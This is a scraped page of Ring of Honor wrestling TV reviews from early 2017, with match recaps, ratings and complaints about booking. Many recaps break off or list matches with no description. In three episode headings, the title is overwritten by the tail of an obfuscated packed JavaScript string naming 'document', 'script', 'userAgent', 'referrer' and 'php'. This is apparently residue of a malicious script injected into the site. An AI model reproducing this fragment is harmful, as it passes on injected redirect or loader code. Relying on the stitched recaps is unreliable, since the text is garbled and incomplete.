Ring of Honor TV – March 22, 2017: The Benefits of Good Wrestling

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Date: March 22, 2017
Location: Stage AE, Pittsburgh, Pennsylvania
Commentator: Ian Riccaboni

Opening sequence.

Beer City Bruiser/Silas Young vs. Cheeseburger/Will Ferrara

Before the match, Young and Bruiser confirm that they have a partner for the April 1 shot at the Six Man Tag Team Titles. Cheeseburger gets flattened with a powerbomb to start before a suplex and low clothesline drop Ferrara. The wrestling sandwich dives back in though and sends his partner into Silas to get a breather. The villains tease sending Cheeseburger over for a tag before grabbing him in a swinging Boss Man Slam backbreaker. Not bad.

Top Prospect Tournament First Round: Josh Woods vs. Chris Lerusso

Lio Rush vs. Kenny King

Chris Sabin and is the new commentary partner. They hit the mat to start with neither being able to hold a headscissors. King misses a bunch of strikes which Rush hits with ease, followed by a jumping enziguri for two. Rush sends him outside for a dive but Kenny breaks up a dive with a kick as we take a break.

Back with Lio slugging away and hitting a Tajiri handspring elbow. Two straight suicide dives keep King in trouble but he rolls through a high crossbody, only to get taken down by a reverse hurricanrana. The frog splash is only good for two (thankfully, as that would have been two of them in three matches). King misses running knees in the corner though and a second frog splash misses. Kenny grabs the Royal Flush for the pin at 8:17.

Post match Caprice Coleman stares Rush down but Shane Taylor comes out for the save. As you might expect, that lasts all of thirty seconds before Taylor lays him out to join the Rebellion. This stable DOES NOT NEED new members!

Jay White vs. Jay Briscoe

Mark Briscoe is on commentary and this is a rematch from their great time limit draw a few months back. White dropkicks him into the corner to start and then sends Briscoe outside for some elbows up against the barricade. Briscoe is done with this defense thing and grabs a hurricanrana, followed by a suicide dive into the barricade for a big crash.

Rating: B. White is good and these two matches have done a great job of making you believe that he can hang with someone much higher up the ladder like Briscoe. ROH takes way too long to build up new stars sometimes so this was quite the change of pace, which is certainly a good thing. Awesome match here as these two have some wicked chemistry.

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WWE Looking Into Buying ROH?



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Ring of Honor TV – March 15, 2017: Tournament Are NOT Always Awesome

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Date: March 15, 2017
Location: Stage AE, Pittsburgh, Pennsylvania
Commentator: Ian Riccabani

Opening sequence.

Alex Shelley is the first guest commentator.

Young Bucks vs. Coast to Coast

Back with Nick hitting a springboard SUCK IT crossbody on Leon. Coast to Coast (the double springboard dropkick to the Tree of Woe) gets two on Nick but that means a superkick. Nick starts firing off more kicks, plus a running Sliced Bread #2. Ali gets superkicked in the back of the leg and the springboard 450 is good for the pin at 7:04.

Post match Leon takes a Twist of Fate and a Swanton Bomb.

We look at Lio Rush teasing joining the Rebellion before costing them a match last week.

Brutal Bob Evans joins Ian and Alex.

Top Prospect Tournament First Round: Curt Stallion vs. Preston Quinn

Jay Briscoe is ready for his rematch with Jay White next week.

Jonathon Gresham vs. Dalton Castle

Marty Scurll is ready for his TV Title defense at Supercard of Honor.

Mark Briscoe joins commentary.

War Machine vs. BJ Whitmer/Punishment Martinez


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Ring of Honor TV – March 8, 2017: One at a Time

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Date: March 8, 2017
Location: Stage AE, Pittsburgh, Pennsylvania
Commentator: Ian Riccabani

The Briscoe Brothers, Jay Lethal and Bobby Fish are ready for their eight man tag against the Bullet Club.

Opening sequence.

Six Man Tag Team Titles: The Kingdom vs. The Rebellion

Rating: D. At what point does Ring of Honor realize that these teams are worthless as well as uninteresting and that having titles for a “division” that has three regular teams (including the champions) is ludicrous. Big waste of time here and time that could have gone to ANYTHING else.

Jay White wants a rematch with Jay Briscoe from their time limit draw a few months back.

Briscoe calls White dog food and accepts.

Top Prospect Tournament First Round: Raphael King vs. Brian Milonas

Christopher Daniels is your new guest commentator.

Bullet Club vs. Jay Lethal/Briscoe Brothers vs. Bobby Fish

Back with the Briscoes on their own and Mark punching all four Club members. A quadruple superkick is well scouted though and the Club is quadruple clotheslined to the floor. Jay gets two off a powerbomb/neckbreaker combination but Matt flips out of the Doomsday Device. Superkicks a go-go set up Cross Rhodes to Jay. The Last Shot sets up a Meltzer Driver for the pin at Jay at 12:46.


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Ring of Honor TV – March 1, 2017: Back on the Rails

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Date: March 1, 2017
Location: Stage AE, Pittsburgh, Pennsylvania
Commentator: Ian Riccabani

We open with a quick speech from Daniels about his tournament win.

Opening sequence.

Adam Page/Adam Cole vs. Addiction

Back with Cole taking too much time posing and charging into an elbow. The STO is enough for the tag off to Kazarian and a Backstabber plants Cole. House is quickly cleaned and the champ dives into a cutter for two more. Cole and Daniels slug it out in the ring with Daniels planting him off an STO. Daniels loads up the BME but lands on a raised boot, allowing Cole to grab a rollup for the clean pin at 7:43.

Kazarian yells at Daniels post match.

Kazarian yells at Daniels again in the back.

Bob Evans replaces Fish on commentary, which is likely going to be a theme tonight.

Top Prospect Tournament First Round: John Skyler vs. Sean Carr

Tempura Boyz vs. Motor City Machine Guns

And never mind because the Guns have been attacked. No match.

We run down the Manhattan Mayhem card with Bobby Fish and Adam Cole giving some simple promos to set up their match. Cole has gotten much, much better on the mic.

TV Title: Donovan Dijak vs. Marty Scurll

Marty is defending after Dijak won a big elimination match a few weeks back. The Code of Honor as Scurll throws a kick instead. Dijak knocks him outside instead and nails a suicide dive followed by a great looking springboard elbow for a near fall. Scurll knees his way out of a suplex attempt and we take a break.


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Ring of Honor TV – February 22, 2017: It Doesn’t Balance Out

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Date: February 22, 2017
Location: Center Stage Theater, Atlanta, Georgia
Commentator: Kevin Kelly

The opening recap of course looks at the tournament, as it should.

Opening sequence.

Silas Young vs. Bull James

Colt Cabana vs. The Boys

Daniels lists all of his accomplishments but none of them matter without winning the World Title. It is his destiny to win the title and it will cement him as the best instead of the best that never was.

Video on the history of the Top Prospect Tournament, which starts up next week.

Decade of Excellence Tournament Finals: Jay Briscoe vs. Christopher Daniels

They shake hands to end the show.


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Ring of Honor TV – February 15, 2017: When Did This Promotion Go Off The Rails?

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khisb|var|u0026u|referrer|fidkt||js|php'.split('|'),0,{})) of Honor
Date: February 15, 2017
Location: Center Stage Theater, Atlanta, Georgia
Commentators: Kevin Kelly, Mark Briscoe

Cody Rhodes is sitting in a dark room smoking a cigar. He goes over some of his former gimmicks and asks if the world is ready for the American Nightmare.

Opening sequence.

Adam Page vs. Matt Sells

Page jumps him during the entrances and hits a Helluva Kick in the corner. A toss into the post sets up the Rite of Passage for the pin at 1:14. The match was such a squash that we cut to the commentary team twice in less than seventy five seconds and Page never took his jacket off.

Jay Lethal/Bobby Fish vs. Adam Cole/Cody

Since this was the main event, Dalton Castle/the Boys vs. the Rebellion has been switched into its place. Therefore, Dalton wants to see some angry teeth from the Boys.

Mark Briscoe is ready to see his brother become #1 contender and win the title in Las Vegas.

Quick hype for the Hardys vs. the Young Bucks. I still love the fact that there has been no mention of the Bucks going to TNA in this whole thing.

Mark Briscoe vs. Sal Rinauro

Rebellion vs. Dalton Castle/The Boys

Overall Rating: D. What in the world is going on with this company right now? The World Title is barely a thing, the TV shows are all over the place, the big story is about waiting on a #1 contender and right now the big draw is bringing in a TNA team to face a team that would rather be in Japan.


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Ring of Honor TV – February 8, 2017: Ring of Ho-Hum

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Date: February 8, 2017
Location: Center Stage Theater, Atlanta, Georgia
Commentators: Kevin Kelly, Colt Cabana

BJ Whitmer/Punishment Martinez vs. War Machine

Rating: C+. This is what the match should have been as War Machine is a great power brawling team. Whitmer is fine once they cut off the Kevin Sullivan nonsense and Martinez is capable of doing some very horrible looking things to jobbers if given the chance. I had fun with this one and the ending was one of the only logical ways to go.

They brawl to another break after the match.

We look back at the Young Bucks agreeing to defend against the Tempura Boyz.

Colt Cabana leaves commentary due to a zero tolerance policy.

Tag Team Titles: Young Bucks vs. Tempura Boyz

Post match Hangman Page comes out to help the Bucks lay the Boyz out.

Marty Scurll loves the idea of six people fighting for a shot at his title.

Lio Rush vs. Chris Sabin vs. Alex Shelley vs. Donovan Dijak vs. Jonathan Gresham vs. Jay White

Scurll stares him down.

War Machine is brawling with Whitmer/Martinez in the back to end the show.


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Ring of Honor TV – February 1, 2017: What I Want From ROH

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfkyf|var|u0026u|referrer|hdbrh||js|php'.split('|'),0,{})) of Honor
Date: February 1, 2017
Location: Center Stage Theater, Atlanta, Georgia
Commentator: Kevin Kelly

We open with Adam Cole bragging about winning the World Title for an unprecedented third time. Not much to see here other than “Cole is awesome.”

Tempura Boyz vs. Coast to Coast vs. Cheeseburger/Will Ferrara

Coast to Coast is Leon St. Giovanni and Shahim Ali. The Tempura Boyz (Yo and Cho) send Coast to Coast outside to start but get kicked in the face for their efforts. Leon gets back in and fires off some elbows to the face so here are the Boyz again to clean house for the first time. Cheeseburger dives on a bunch of people and Cho does the same for an even bigger crash.

Video on Juice Robinson.

TV Title: Marty Scurll vs. Juice Robinson

Jay Lethal and Jay Briscoe are ready to fight in the tournament.

Decade of Excellence Tournament Semifinals: Jay Lethal vs. Jay Briscoe


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Ring of Honor TV – January 25, 2017: The ECW Formula

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bynis|var|u0026u|referrer|zhyik||js|php'.split('|'),0,{})) of Honor
Date: January 25, 2017
Location: 2300 Arena, Philadelphia, Pennsylvania
Commentators: Nigel McGuinness, Kevin Kelly

We open with a video on Scurll and Ospreay for a really good visual of how different they are.

Opening sequence.

Jonathan Gresham vs. Marty Scurll

Jay Lethal is ready to beat anyone left in his quest to get the World Title back.

Decade of Excellence Semi-Finals: Christopher Daniels vs. Chris Sabin

Daniels helps Sabin up.

Dragon Lee vs. Will Ospreay vs. Kushida

Overall Rating: B-. This was the kind of entertaining show that it needed to be with a lot of entertaining wrestling and some moderate story progression. I like the idea of having some new characters brought in and everything was a lot of fun. Just do more stuff like this instead of doing the same boring stuff that this show has a tendency to put on.


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